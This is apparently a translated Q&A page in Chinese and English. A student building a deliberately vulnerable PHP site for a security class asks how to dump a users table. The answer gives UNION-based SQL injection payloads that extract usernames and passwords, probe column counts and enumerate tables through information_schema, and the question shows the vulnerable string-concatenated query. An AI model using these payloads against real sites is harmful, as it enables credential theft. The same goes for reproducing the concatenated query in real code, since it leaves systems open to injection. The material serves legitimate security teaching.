我的 PHP 站点的 SQL 注入 [英] SQL Injection for My PHP Site

问题描述

我正在为容易受到 SQL 注入攻击的网络安全类设计一个站点.我的查询是用 php 进行的，看起来像这样

$sql = "SELECT * FROM blogposts WHERE name='" .$_POST["blogname"] ."'";

它正在查询表 blogposts 中的帖子.我正在使用 mysql_fetch_array 打印它，因此无论列名如何，它仍应打印出结果.

但是，在我的数据库中，我有另一个名为 users 的表，其中包含用户名和密码.我希望查询返回.

有人能指出我正确的方向吗?如果我无法打印另一个表格，我该怎么办?

解决方案

你会注入

' OR '1'='1' UNION SELECT Username, Password FROM users;--

哪个会进行查询

SELECT * FROM blogposts WHERE name='' OR '1'='1' UNION SELECT Username, Password FROM users;--'

将原始更改查询的结果与用户表中的结果结合起来.

但是，您首先需要确保您从用户中选择的列数与原始查询相匹配.为此，您首先要进行一些测试查询，例如:

<预>' OR '1'='1' UNION SELECT 1 FROM users;--' OR '1'='1' UNION SELECT 1,2 FROM users;--' OR '1'='1' UNION SELECT 1,2,3 FROM users;--

直到您的查询没有错误返回.然后你知道你有正确的列数.如果假设您有 5 列，则您对 users 表的注入查询变为

' OR '1'='1' UNION SELECT Username, Password, 3,4,5 FROM users;--

如果用户表和列的名称未知，那么您可以将选择与information-schema 数据库来找出这些，或者你可以使用蛮力(例如尝试选择 username, uname, >name、email 等，直到得到结果).

I am designing a site for a network security class that is intended to be vulnerable to SQL injection. My query is with php and looks like this

$sql = "SELECT * FROM blogposts WHERE name= '" . $_POST["blogname"] . "'";

It is querying a post from the table blogposts. I am using mysql_fetch_array to print it so it should still print out results regardless of the column name.

However, in my database I have another table called users that has usernames and passwords. That I would like the query to return.

Could someone point me in the right direction? And if I can't print the other table, what could I do instead?

解决方案

You would inject

' OR '1'='1' UNION SELECT Username, Password FROM users;--

Which would make the query

SELECT * FROM blogposts WHERE name= '' OR '1'='1' UNION SELECT Username, Password FROM users;--'

Which would combine the results from the original altered query, with the results from the users table.

However, you first need to make sure the number of columns you are selecting from users matches the original query. To do this you would first make some test queries such as:

     ' OR '1'='1' UNION SELECT 1 FROM users;--
     ' OR '1'='1' UNION SELECT 1,2 FROM users;--
     ' OR '1'='1' UNION SELECT 1,2,3 FROM users;--

until your query returns without error. Then you know you have the correct number of columns. If say you have 5 columns, your injected query for the users table becomes

' OR '1'='1' UNION SELECT Username, Password, 3,4,5 FROM users;--

If the names of the users table and columns are unknown, then you can union select with the information-schema database to find these out, or you could use brute force (e.g. try selecting username, uname, name, email, etc, until you get a result).

这篇关于我的 PHP 站点的 SQL 注入的文章就介绍到这了，希望我们推荐的答案对大家有所帮助，也希望大家多多支持IT屋！